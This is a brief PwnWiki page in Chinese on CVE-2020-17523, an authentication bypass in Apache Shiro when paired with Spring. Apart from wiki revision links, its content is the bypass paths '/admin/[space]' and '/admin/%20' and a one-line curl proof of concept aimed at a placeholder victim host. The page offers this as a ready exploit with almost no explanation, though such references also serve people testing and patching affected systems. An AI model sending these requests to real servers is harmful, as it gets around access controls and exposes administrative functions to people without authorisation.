CVE-2020-17523 Apache Shiro pathMatches 身份認證繞過漏洞

From PwnWiki
Revision as of 17:42, 18 March 2021 by Pwnwiki (talk | contribs) (Marked this version for translation)
(diff) ← Older revision | Latest revision (diff) | Newer revision → (diff)
Other languages:
Chinese • ‎中文(台灣)‎

條件

Shiro with Spring


/admin/[space]
/admin/%20

POC

curl -v http://[Vimtim]/admin/%20/